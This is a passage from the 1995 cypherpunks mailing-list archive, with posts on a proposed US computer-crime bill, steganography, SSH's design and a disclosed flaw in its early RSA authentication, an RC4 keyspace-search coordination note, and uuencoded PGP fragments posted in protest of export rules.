Subject: No Subject
Message-ID: <199507140410.AAA12152@jax.jaxnet.com>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: Zachary H. Hanna * EMC.Ver #2.5.02 ] --

Sure, what the hell.

------------------ PGP.ZIP Part [029/713] -------------------
MA@AT14NXXX4KXP+G,!8*\;,+L6`0&L`./;4)LO9H"`=4U&8<H`"'L1%SX0<U
M_O"D7)S`/FS"#$2A"YK#">4>M#/RD(3F,,`9?Q+[-9Q##G;BD8XQBPLXB3W8
MC%1$H@MD*/4B3^Q'.M[':!@AQ[TZ";+/L`63,`@!>$C=OL,4#,5VGP19+`9"
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Thu, 13 Jul 95 21:12:09 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Stego Standards Silly ? (Was: Re: def'n of "computer network")
In-Reply-To: <9507140229.AA13447@snark.imsi.com>
Message-ID: <9507140411.AA15519@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

.pm writes:
> Indeed -- how could the recipient even know to look, unless these
> things arrived regularly and with a fully standardized form of
> stegonography, in which case why bother, all you've done is come up
> with a very odd form of transfer encoding.

I agree, but AFAICS an odd form of transfer encoding is exactly what the
doctor ordered. For plausible cryptodeniability, one wants to send 
ciphertext using a transfer encoding that doesn't automatically ring alarm
bells. Steganography amounts to laundering Content-Type: headers.

> If the recipient does know to look, that implies either that there is
> a hint, in which case the stegonography is useless, or it implies that
> you have prearrangement, in which case my comments on prearrangement
> hold.

If the recipient isn't getting spammed with GIFs (or whatever), she (or
rather her MDA) can simply look at all of them by default. Of course this
does not help with anonymous message pools on the order of Usenet, but that
is a sub-issue.

Deranged Mutant raised an IMHO important issue a few months ago. He suggested
that Mallet could go about trashing the purportedly "random" bits in each
instantiation of some transfer encoding used in a stego standard. For
example, he shuffles the LSBs of every passing JPEG. I'm not sure how feasible
this would really be (both technically and sociopolitically), but it
could be a big annoyance if only a few people were suspected of using stego
method XYZ. 

The standard answer to agent-in-the-middle tampering is of
course digital signatures. Now, the question is, will we be allowed to sign
our possibly-stego-enclosing GIFs with reasonable confidence that the govt.
can't forge our signatures ? Obviously the signature itself can't be
stegoed, or else we fall into an infinite regress.

 -Futplex <futplex@pseudonym.com>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMAXuSWf7YYibNzjpAQHlpQP/f3/e5iRl67zU3TLYZH1oNBBjC1+LYPH8
VkQMhvtRdlo2xBkY56jaZ6hZuzWanknVD1EKrG72vl5sPytXXDs5dVplFlelVw6f
VjC2UxNHe0dQHmmJqXNMMq4qlC8ZxgtNf4P9O+6iJKjz6SbA7F6LuRd+3TXv5tHm
xgGSY5bzJp8=
=ia+X
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Allen Robinson <sebaygo@intellinet.com>
Date: Thu, 13 Jul 95 22:10:48 PDT
To: Ray Arachelian <sunder@escape.com>
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <Pine.SUN.3.91.950713163526.25718G-100000@escape.com>
Message-ID: <Pine.3.89.9507132317.C24198-0100000@sibyl.intellinet.com>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 13 Jul 1995, Ray Arachelian wrote:

> On Thu, 13 Jul 1995, L. McCarthy wrote:
> 
> > Mr. GRASSLEY. Mr. President, I rise this evening to introduce the
> > Anti-electronic Racketeering Act of 1995. This bill makes important changes
> > to RICO and criminalizes deliberately using computer technology to engage in
> > criminal activity. I believe this bill is a reasonable, measured and strong
> > response to a growing problem. According to the computer emergency and
> > response team at Carnegie-Mellon University, during 1994, about 40,000
> > computer users were attacked. Virus hacker, the FBI's national computer
> > crime squad has investigated over 200 cases since 1991. So, computer crime is
> > clearly on the rise.
> 
> Eh, what do "virus hackers" have to do with encryption, why is it these 
> morons justify the destruction of encryption by mentioning hackers and 
> viruses?

The use of terms such as "virus" and "hacker" in a context such
as this has little or nothing to do with what the terms actually
mean.  It's palpably obvious that they are being bandied about
here solely for the knee-jerk emotional reactions they evoke.
Even those more computer/net clue-impaired than Grassley (assuming
that such is possible) know from watching TV and the movies that
a virus is a Bad Thing (tm) and that hackers are evil!
Pseudo-digital demagoguery.
 
> Additionally, does this mean that someone outside of the USA is in danger 
> of being grabbed by RICO armed thugs from Uncle Sam's cadre for writing 
> crypto software and publishing it in the open?  After all, once it winds 
> up on some USA site, how do we know that someone outside the USA got his 
> copy of SuperDuperNSASpookFree from a non-US site?  Just to be sure, 
> we'll bust both the site operator and nab the guy who wrote it next time 
> he drops in, or hell, we'll have him extradited.  

Or simply kidnap him and escort him back to the U.S.
 
<snip>

> > I believe we need to seriously reconsider
> > the Federal Criminal Code with an eye toward modernizing existing statutes
> > and creating new ones. In other words, Mr. President, Elliot Ness needs to
> > meet the Internet.
> 
> Where is Elliot Ness?  I don't see any mafia.org on the net.  Anyone here 
> see any such site?

It might be even more beneficial if Senator Grassley and the other
members of our august deliberative bodies would meet the internet.
My gut reaction to the recent tide of legislation is that they are
seeking to stangle what they fear and that they fear what they do
not understand.  (Too melodramatic?)
 
> > Mr. President, I sit on the Board of the Office of Technology Assessment.
> > That Office has clearly indicated that organized crime has entered cyberspace
> > in a big way. International drug cartels use computers to launder drug money
> > and terrorists like the Oklahoma City bombers use computers to conspire to
> > commit crimes.
>
> Was it not proven that McVeigh and Co. >DID NOT< use a computer?  THe AOL 
> account was a hoax, no?  Where are the hoardes of anti-USA terrorists, 
> and drug pushers on the net? 

You don't recognize them because they are masquerading 
as "virus hackers".

Again, the main reason for playing the "terrorist" card is
for the emotional hot-buttons they can push by so doing.
Since Grassley didn't use it, look for someone to introduce
something this session titled, "The Avenge Those Poor,
Innocent, Bloody Dead Children Act of 1995".

AR

%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%
"Government is not reason... it is force.  Like fire, it is a dangerous
servant and a fearful master."                      - George Washington
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Allen Robinson...................................sebaygo@intellinet.com
PGP public key AD022AA9   fingerprint 5A3BC05B2EC67724 F5664A20AEEAB07A





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Thu, 13 Jul 95 15:15:12 PDT
To: tcmay@sensemedia.net
Subject: Re: Crisis Overload (re Electronic Racketeering)
In-Reply-To: <ac2aab2c0b021004b5fe@[205.199.118.202]>
Message-ID: <199507132215.BAA17628@shadows.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


One motivation behind SSH is trying to make it a de-facto standard
replacement for rlogin and rsh.  That would make it very hard to
replace.  It provides important benefits in authentication and
protection against intruders - and as a side effect it provides hard
to break encryption for anyone.  Plus, it was created and is primarily
distributed *outside* the United States, in a country where none of
the algorithms are patented.  It can thus be openly available for
anyone, and is not limited by US export restrictions.  It currently
includes two algorithms that I know to be patented: RSA and IDEA.
IDEA can be eliminated from it without breaking compability if it
turns out necessary (and, several sources say that non-commercial use
of IDEA is permitted).  RSA is not patented anywhere but in the US,
and there it may be possible for most people to get away by using
RSAREF.

There is more information at http://www.cs.hut.fi/ssh.  The RFC
describes the protocol.

The current list of distribution sites includes:
   ftp.funet.fi:/pub/unix/security
   ftp.unit.no:/pub/unix/security 
   ftp.net.ohio-state.edu:/pub/security/ssh 
   ftp.kiae.su:/unix/crypto 
   ftp.cs.hut.fi/pub/ssh 

More sites are welcome.

    Tatu Ylonen <ylo@cs.hut.fi>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Thu, 13 Jul 95 15:42:14 PDT
To: hayden@krypton.mankato.msus.edu
Subject: Re: Crisis Overload (re Electronic Racketeering)
In-Reply-To: <Pine.ULT.3.91.950713140141.8587C-100000@krypton.mankato.msus.edu>
Message-ID: <199507132241.BAA18366@shadows.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


> massive use of cryptography started.  This means, and I advocated this 
> from the day I entered this forum, that programs such as PGP need to be 
> redesigned so that the a user friendly . . . so user friendly that any 
> Joe Moron can figure out not only how to use them, but also how it helps 
> them and how it is "good" for them.  This means that we need simplified 
> key management easy enough for the point-and-click masses to utilize.  
> This means that common mailing programs, From Elm and Pine to AOLs and 
> Computer$erve's mailers need to have TRANSPARENT signing of mail messages 
> and near-transparent encryption of messages.  This means that we need to 

I agree.  If you forgive me for again taking the opportunity to
advertise SSH, one goal was to make it as simple to use as possible.
To get all the benefits of encryption and most benefits of improved
authentication, the users need to know absolutely nothing in addition
to what they need to know with rlogin.  Plus, there are many
convenient features, such as automatic X11 forwarding (encrypted;
DISPLAY is set to point to a fake display), command exit status is
returned properly, etc.

Of course, rlogin and rsh are much less important applications for the
general public than e-mail.  I think the currently the most critical
problem areas are exactly e-mail and interactive messaging programs
(like irc, rwrite etc).

Most mail (at least on the internet) is currently propagated
automatically from the sending host to the receiving host.  A fairly
simple, 90% of the benefit at 10% of the effort solution could be to
have sendmail (or equivalent) encrypt all communications that go
through the network.  This would make electronic mass surveillance and
scanning difficult.  It is much more expensive (and dangerous
publicity-wise) to read messages by breaking into a computer system.
This kind of system could be installed without the user even being
aware that something like that is in use.  It is not a perfect
solution - some sites will not support encryption, and some messages
might get sent without it.  Still, the bulk of the messages would be
encrypted, and any really sensitive data could be additionally PGP (or
similar) encrypted.  The procotol and implementation would have to be
well made and established as internet standards.

    Tatu Ylonen <ylo@cs.hut.fi>

For more information about SSH, see http://www.cs.hut.fi/ssh.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 14 Jul 95 01:44:50 PDT
To: cypherpunks@toad.com
Subject: c2.org now offers telnet-only accounts
Message-ID: <199507140842.BAA06740@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	"The Premier Cypherpunk ISP" now offers shell accounts at a
discount to those who will just telnet in and not use the dialup
pool. We are one of the only ISPs in the country who offers anonymous
shell accounts. (Payment in advance, of course.)
	Check out http://www.c2.org

	If you think our net is too slow right now, check back in
about a month.

	("Premier Cypherpunk ISP" is a bit of a joke, btw)
-- 
sameer						Voice:   510-601-9777
Network Administrator				Pager:	 510-321-1014
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Thu, 13 Jul 95 22:47:32 PDT
To: perry@imsi.com
Subject: Re: Fight, or Roll Over?
In-Reply-To: <9507140301.AA13498@snark.imsi.com>
Message-ID: <199507140547.BAA26040@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


Perry writes:

| watched and learned of indicates to me that there are enough people
| and companies with an interest here to raise a few million
| dollars. Consider that Netscape alone is a very wealthy company that
| would have its marketing plans strongly disrupted by this new piece of
| congressional trash.

	Sun is also a probable ally.  John Gage (Sun's chief technical
officer?) regularly slams the ITARs, as does CEO Scott McNealy.

	It would seem that those who don't write code should be out
advocating the positive uses of cryptography, and looking for groups
who can effectively fight this the way people normally fight bad
legistlation in Congress.  Petitions don't work.  Spending piles of
cash does.  Writing code works even better.

Adam


-- 
"It is seldom that liberty          I Support The Phil
of any kind is lost all at     Zimmermann legal defense fund
once."               -Hume    http://www.netresponse.com/zldf

------------------ PGP.ZIP Part [001/713] -------------------
M4$L#!!0````(`">9ZQX3(*,_DG8!`-JF`P`'````4$=0+D581>S;=UQ3U__X
M\9M!$E8,TT@PJ$10$1=*41%WW`KX$=Q[M5KK`&R%(HH+(T.M"S>NME8K=31N
M:A$[K+5(K:O5BE405ZE:1"3?UTW`:K_]\/G\?O_^?CX>3^_-S;GGO,^\`^@W
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpb@shadow.net (Joe Block)
Date: Thu, 13 Jul 95 22:47:28 PDT
To: Brad Dolan <bdolan@use.usit.net>
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <v01520c00ac2b66391bae@[198.79.48.49]>
MIME-Version: 1.0
Content-Type: text/plain


re:
>On June 27, Sen. Grassley introduced extensive criminal amendments to the
>federal racketeering act.  S. 974, the "Anti-Electronic Racketeering Act of
>1995," would amend U.S. Code sections 18 USC 1961 (criminal RICO statute),
>18 USC 1030A (new section on computer crime), 18 USC 2515, 2516
>(wiretapping), and 42 USC 2000aa (Privacy Protection Act).

This is a shining example of the Conservation of Tyranny.  The former
Soviet Union is becoming more free (with admittedly a few bumps in the
road), so the US is becoming less so (with a few bumps such as the
temporary defeat of Clipper).

Sadly, this is only partially tongue in cheek.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "K. M. Ellis" <kelli@zeus.towson.edu>
Date: Thu, 13 Jul 95 23:03:18 PDT
To: cypherpunks@toad.com
Subject: Grassley:  Lick my Gorton, Exon me all night long...
Message-ID: <Pine.ULT.3.91.950714015400.5379C-100000@zeus.towson.edu>
MIME-Version: 1.0
Content-Type: text/plain



I don't know if anyone has taken this into consideration:  several people
have noted that the anti-racket-whatever bill doesn't have too much chance
of getting out of committee because its wording is a bit, well, broad. 
It's being reviewed by the Senate Judiciary committee.  This is a problem 
for us, because Sen. Grassley is the chair of that committee.

His e-mail address is chuck_grassley@grassley.senate.gov, fire away!

Proud to be an Amurican,
-=Kathleen M. Ellis=-

"Buy your data, encrypt a rifle, and wait to be revolting..."
                                       -=The Book of Phil 7:1=-
kelli@zeus.towson.edu              http://zeus.towson.edu/~kelli/
GAT d? H+ s+++:-- !g p? !au a- w++@ !v@ c++++ UL++ P+ L+ 3 E---- N+ K W--- 
M-- V-- po- Y++ t+ 5-- jx R G'''' tv- b+++ D-- B e+ u** h* f++ r--- n+ z**
Diverse Sexual Orientation Coll.Towson State University DSOC@zeus.towson.edu
BigBrotherSystemsBBS........BigBrotherIsWatchingYou.......(410)494-3253#11





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Thu, 13 Jul 95 16:03:36 PDT
To: mazieres@pa.dec.com
Subject: Re: Ssh security hole?
In-Reply-To: <9507132008.AA27925@ima.pa.dec.com.pa.dec.com>
Message-ID: <199507132303.CAA18383@shadows.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


(I'll forward your message to a couple of lists where it might be
of interest; the original message is at end.)

I think you are right in your analysis.  There is indeed a problem
with RSA authentication.  Basically what this means is that if you log
into a corrupt host, that host can at the same time log into another
host with your account (by fooling you to answer to the request)
provided that you use the same RSA identity for both hosts.

A workaround is to use a different identity for each host you use.
The default identity can be specified on a per-host basis in the
configuration file, or by -i options.

And, yes, I think the same problem might occur with client host
authentication.  Though, there you would still have to do IP-spoofing,
DNS spoofing or similar to get through (breaking RSA based host client
effectively reduces RhostsRSAAuthentication to conventional .rhosts
authentication).

The protocol will need to be changed somewhat because of this.  I'll
think about it tomorrow and let you say you opinion about it.

Thanks!

    Tatu Ylonen <ylo@cs.hut.fi>

Date: Thu, 13 Jul 1995 13:08:15 -0700
From: David Mazieres <mazieres@pa.dec.com>
To: ssh-bugs@cs.hut.fi
Cc: rtm@eecs.harvard.edu, dm@eecs.harvard.edu, tbl@eecs.harvard.edu
Subject: Ssh security hole?

I believe there is a serious problem with the RSA authentication
scheeme used in ssh, but then again I could be misreading the proposed
RFC.  Is the following really the case?

As I understand the protocol, here is what happens during SSH_AUTH_RSA
authentication.

Suppose the holder of SKu, is allowed access to account U on machine B
(which holds SKb).  Both PKu and PKb are widely known.  In addition,
machine B has a session key, PKs, which changes every hour.  When U on
machine A wants to log into machine B, here's what I think happens
based on my reading of the RFC:

A -> B: A

B -> A: (PKb, PKs, COOKIE)
	[A flags an error if PKb is not the stored value.]

A -> B: (COOKIE, {{Kab}_PKs}_PKb)
A -> B: {U}_Kab
A -> B: {PKu}_Kab
	[B aborts if SKu is not allowed access to account U.]

B -> A: {{N}_PKu}_Kab

A -> B: {{N}_MD5}_Kab (*)
	[B aborts if the MD5 hash is invalid.]

B -> A: access to acount U with all data encrypted by Kab.

The problem is, suppose U actually wanted to log into machine C, which
was maintained by an untrusted person.  The person maintaining C could
initiate a connection to B the minute U tried to log into C.  When
given a challenge {{N}_PKu}_Kbc, C could simply give this to A as the
challenge to respond to, and then forward the response to B.

To fix the problem, A must at the very least include B in the
response line marked (*).  I have reason to believe (after having just
seen a lecture on authentication), that you might even need to include
more.  A safe bet might be (but then again I am no expert):

A -> B: {(N, A, B, Kab)}_MD5

I think similar problems arise for the other authentication methods.

Other than that, though, I am really impressed by by ssh.  It's easy
to install and easy to use.  In fact, it is even more convenient to
use than standard rsh, because the X forwarding happens
automatically.

Thanks for such a great package!

David




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Scoggins <gds@connex.com>
Date: Fri, 14 Jul 95 02:06:58 PDT
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Anti-Electronic Racketeering Act of 1995
In-Reply-To: <199507131932.PAA01245@bb.hks.net>
Message-ID: <Pine.3.89.9507140106.B22784-0100000@apollo.connex.com>
MIME-Version: 1.0
Content-Type: text/plain



According to Shari Steele:

> Fortunately, the bill does not have a very promising future.  The bill has
> no co-sponsors.  It was immediately referred to the Committee on the
> Judiciary, where it currently sits.  LEXIS's bill tracking report only
> gives it a 10% chance of passing out of the committee.

Thank God, if true.

After lurking on this list for a couple of months, I finally feel 
motivated to comment by this latest bout of official stupidity.

I realize that I am preaching to the choir here, so if you don't need any 
more convincing, feel free to delete this now.  And for those readers not 
in the US - pray pardon the US-centric tone of this piece.

I have been steadily lowering my opinion of the human race for 20 years 
now.  It is depressing to realize that I may have to ratchet it downward 
another notch or two.  That our various elected representatives and 
assorted civil masters are stupid, venal, corrupt, short-sighted, 
incompetant, arrogant, foolish, greedy, megalomaniacal, immoral poltroons 
with the manners of billy goats utterly lacking in common sense or common 
decency no longer surprises me.  What does still surprise me is just *how* 
stupid, venal, corrupt, etc they really are.  If we can not govern 
ourselves better than this, then we really are just overgrown chimpanzees.

And our cousin primates should probably feel insulted by the comparison.

The United States used to be a special place, and I used to be proud of 
being a citizen of this country.  Sadly, this is no longer true.  Our 
government, in all three of its branches and its multiplicity of 
agencies, bureaus, departments and services, has made a mockery of the 
Constitution.  The Ninth and Tenth Amendments are laughed at, the Fourth 
and Fifth Amendments are in tatters, the Second is under incessant 
attack, and the First...  well, the First Amendment to the Constitution 
of the United States is basically being gang-raped by Congress as we speak.

Consider those words, "as we speak".  Clearly, I consider what I am doing 
now to be "speech".  It is not face to face, I am not in the presence of 
all of you in one place at one time speaking these words aloud - but it 
is still speech.  Most of you who read this, perhaps all of you, will 
agree, I think.  What we do on the 'net - in email, in Usenet, in irc - 
is communication between human beings - fundamentally, speech.  It is 
obvious to us that speech, regardless of medium, should be protected by 
the First Amendment.

Equally obvious, many in Congress, the Administration and the Federal Courts
disagree.  The courts, and in particular the Supreme Court have by a 
process of straining at gnats and swallowing camels "interpreted" the 
Constitution in such a way as to permit clearly unconstitutional laws and 
practices to continue.  They are wrong, but so what.  The knowledge that 
you are wholly right and that your opponents are wholly wrong is of small 
comfort when the noose is around your neck.

Many Americans now actively fear the Federal government and its Law 
Enforcement Agencies, and justly so.  Every day more evidence emerges of 
profound and widespread abuse of power, corruption and official arrogance 
on the part of the LEAs, yet many of our Senators introduce and vote for 
legislation that would severely weaken the precious few remaining 
restraints on their power, and grant them even broader and ever more 
sweeping powers to invade the privacy and abridge the rights of American 
citizens.

The United States used to be special.  It was founded by people who 
believed that human beings had rights that were *not* simply privileges 
granted by the state, but were innate and could *not* be taken away.  (Or 
at least you did as long as you were an adult white male property 
owner.)  They believed that governments had no powers unless they were 
granted by the people, not the other way round.  In short, they believed 
in the principles and philosophy outlined in the Declaration of Independence.

This is no longer the case.  Two hundred and nineteen years later, we pay 
lip service to the ideals of the Declaration every July Fourth, but the 
last person in Congress who paid any attention to those ideals was 
apparently Barry Goldwater.

Let us be realistic for a moment.  Consider this a half-hearted apologia 
for Senator Grassly, if you will.  France already bans crypto, modulo 
some exceptions that I believe are rather hard to qualify for.  And I 
consider a judicial system based on the Napoleonic Code reprehensible.  
Yet by all accounts France remains a tolerable and decent place to live.  
Without irony, most people refer to France as part of the Free World.  
The UK, Canada and Australia have censorship laws, Official Secrets Acts 
and the like that permit prior restraint of publication and other things 
that we Americans find distressing.  Yet I believe that the UK, Canada and 
Australia remain tolerable and decent places to live, and they too are 
considered part of the Free World.

If Senator Grassly's bill is enacted into law, it will not be the End of 
the World.  The United States will not suddenly have become Nazi Germany.
This country will remain, for the vast majority of Americans and even 
most cypherpunks, a tolerable and decent place to live.  It will still be 
one of the few countries in the world to grant its citizens the 
relatively unchecked freedom to speak their minds, to work at whatever 
profession or occupation they wish, to travel where they wish.

It just means that a tiny bit more of our rights will have been eroded, 
our freedom lost - a little bit more of what used to make this a special 
place, of what used to make this country different from - and in my 
opinion as a still somewhat patriotic American - better than France, Canada, 
Australia and the UK - will have disappeared.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Fri, 14 Jul 95 02:19:59 PDT
To: "Vladimir Z. Nuri" <cypherpunks@toad.com
Subject: Re: speeding detected by civilians
Message-ID: <199507140918.CAA04658@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:01 PM 7/13/95 -0700, Vladimir Z. Nuri wrote:
>Vernon Hills, Illinois, a Chicago suburb, has passed legislation allowing 
>citizens to check out radar guns from the local police department to 
>catch speeders in their community. The radar guns are combined with 
>cameras in order to instantaneously capture the car, license number, and the 
>rate of speed. The citizens can check out the units for a week at a time. The 
>police have stated that they, at this time, will use the data to issue 
>warning letters to the violaters.

I wonder how they'll feel if citizens start tracking the speeds of
police cars and reporting them..... :-)
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Fri, 14 Jul 95 02:20:11 PDT
To: cypherpunks@toad.com
Subject: Re: Fight, or Roll Over?
Message-ID: <199507140918.CAA04669@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:56 PM 7/13/95 -0700, Timothy C. May wrote:
>criminalizes groups which support This Year's Enemies. (Like the War with
>Oceania--or was it Eurasia?--the friend of today was yesterday's criminal
>organization. 
Wow!  The Oceania folks haven't even raised enough funds to make a credible
floating city, and already they're at war!?  (Or, alternatively,
No, Oceania's always been at war with _East_asia...)

>Some would say this means Cypherpunks should step into the fray and become
>a lobbying group. I don't see us as having the structure or organization to
>become such a group. Those who wish to should probably form a real group to
>do this, with bylaws and elected officials.

There's already an EFF, and lobbying probably looks better with our EFF hats
on than with Cypherpunks hats and non-exportable T-Shirts on.  Cypherpunks
is more for lobbying the public by putting out code than for lobbying CONgress.

>Anarchies are great, but there's no way an anarchy can have a "spokesman,"
>or a budget for travel and lobbying, or a hundred other things that a
>lobbying group needs. Cypherpunks--this list--is just not in a position to
>be this group.

Consensus-oriented coalitions can also work marvelously inefficiently :-)

#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Thu, 13 Jul 95 16:26:45 PDT
To: sunder@escape.com
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <Pine.SUN.3.91.950713163526.25718G-100000@escape.com>
Message-ID: <199507132326.CAA18396@shadows.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


> So, what countries are left free of encryption regulations? (English 
> speaking preffered, with affordable net access.)  Time to see about 
> getting a new passport...

Finland, as far as I know, does not have any restrictions on
encryption, and has a friendly population.  Finnish is indecipherable
at first, but almost everybody can speak English (at least the younger
population).  There is a big shortage of competent computer and
electronics engineers.  Nokia Telecommunications (a major mobile phone
manufacturer) for example would need much more competent people than
they can get - not to mention the smaller companies.

Finland has excellent network connections - typical ftp rates from the
US are tens of kilobytes per second (except at peak hours).  There is
a lot of competition among the internet service provides.  About
$20/months gets you 28.8k dialup ppp (1-2 hours/day at that rate, I
think).  Another provider charges about 5 cents per minute.  A leased
64k line is around $100/month.

The climate is nice during the summer (15-25 Celsius typical), and
cold during the winter.

Taxes are outrageous though, so you really had better check that
first.  But, the taxes include things like medical insurance, pension
insurance, etc., and are thus not directly comparable.

And of course, we are now a member of the European Union, which
worries me a little on this front...

(Sorry, I just couldn't resist the temptation :-)

   Tatu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "K. M. Ellis" <kelli@zeus.towson.edu>
Date: Thu, 13 Jul 95 23:31:00 PDT
To: cypherpunks@toad.com
Subject: Grassley:  correction
Message-ID: <Pine.ULT.3.91.950714022706.6071A-100000@zeus.towson.edu>
MIME-Version: 1.0
Content-Type: text/plain


Please disregard my post about Grassley being the chair of the senate 
Committee on the Judiciary; Orrin Hatch (Utah) is the chair.

The number of the committee office is (202)224-5225.

I'm sorry for the misinformation--hope it didn't cause to much frustration.

-=kathleen m. ellis=-

"Buy your data, encrypt a rifle, and wait to be revolting..."
                                       -=The Book of Phil 7:1=-
kelli@zeus.towson.edu              http://zeus.towson.edu/~kelli/
GAT d? H+ s+++:-- !g p? !au a- w++@ !v@ c++++ UL++ P+ L+ 3 E---- N+ K W--- 
M-- V-- po- Y++ t+ 5-- jx R G'''' tv- b+++ D-- B e+ u** h* f++ r--- n+ z**
Diverse Sexual Orientation Coll.Towson State University DSOC@zeus.towson.edu
BigBrotherSystemsBBS........BigBrotherIsWatchingYou.......(410)494-3253#11





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin Wang (The Scarecrow) <kwang@blackbox.punk.net>
Date: Fri, 14 Jul 95 00:34:52 PDT
To: cypherpunks@toad.com
Subject: RC4 - I grabbed too much keyspace
Message-ID: <199507140732.DAA08254@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Due to a misunderstanding on my part, I grabbed too much key space.
Here's one contiguous block that needs to be worked on:

9 1a80000000 31
10 1b00000000 31
11 1b80000000 31
12 1c00000000 31
13 1c80000000 31
14 1d00000000 31
15 1d80000000 31
16 1e00000000 31
17 1e80000000 31
18 1f00000000 31
19 1f80000000 31
20 2000000000 31
21 2080000000 31

   - Kevin Wang, kwang@lore.acs.calpoly.edu
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMAYdXioZzwIn1bdtAQHgRgF/dsbrZ2oYofdm52KX8QsAOlg+Seiw2cXO
1P3p0HBbDW7Ukyyyv1UphZkrD7JQsDJP
=m+pJ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an250888@anon.penet.fi
Date: Thu, 13 Jul 95 21:06:09 PDT
To: cypherpunks@toad.com
Subject: Deployment
Message-ID: <9507140349.AA21714@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


>In addition, now is the time to deploy stego, on a massive scale.  
>How many stego programs have been released for Unix?

Unix?  The masses use DOS, Windows, Mac, and OS/2.  All you Unix gurus
with nifty Unix crypto utilities that PC users can only wonder about
need to buy PC's and start porting now if you want to get anywhere.

Unix?  Hah!  Gimme a break!  Unix is a Warsaw ghetto.

----------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
If you reply to this message, your message WILL be *automatically* anonymized
and you are allocated an anon id. Read the help file to prevent this.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an250888@anon.penet.fi
Date: Thu, 13 Jul 95 21:07:02 PDT
To: cypherpunks@toad.com
Subject: Off Your But and Learn!
Message-ID: <9507140349.AA21822@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


>I am not a programmer either, but I am being motivated to become one. 
>If only there was more time.

Neither am I, but may I suggest the following:

S. Prata, C++ Primer Plus: Teach Yourself Object-Oriented Programming,
2d ed., Waite Group Press, ISBN 1-878739-74-3 (1995).  Nuts & bolts.

S. Lippman, C++ Primer, 2d ed., Addison-Wesley, ISBN 0-201-54848-8
(1993).  Not quite so nuts and bolts, but good to read after covering
the treatment of the same material in Prata.

I've just starting working through these and find them effective.

----------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
If you reply to this message, your message WILL be *automatically* anonymized
and you are allocated an anon id. Read the help file to prevent this.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "K. M. Ellis" <kelli@zeus.towson.edu>
Date: Fri, 14 Jul 95 01:12:44 PDT
To: "Timothy C. May" <tcmay@sensemedia.net>
Subject: Cypherpunks Lobbying?
In-Reply-To: <ac2aef1700021004f93e@[205.199.118.202]>
Message-ID: <Pine.ULT.3.91.950714023803.6182A-100000@zeus.towson.edu>
MIME-Version: 1.0
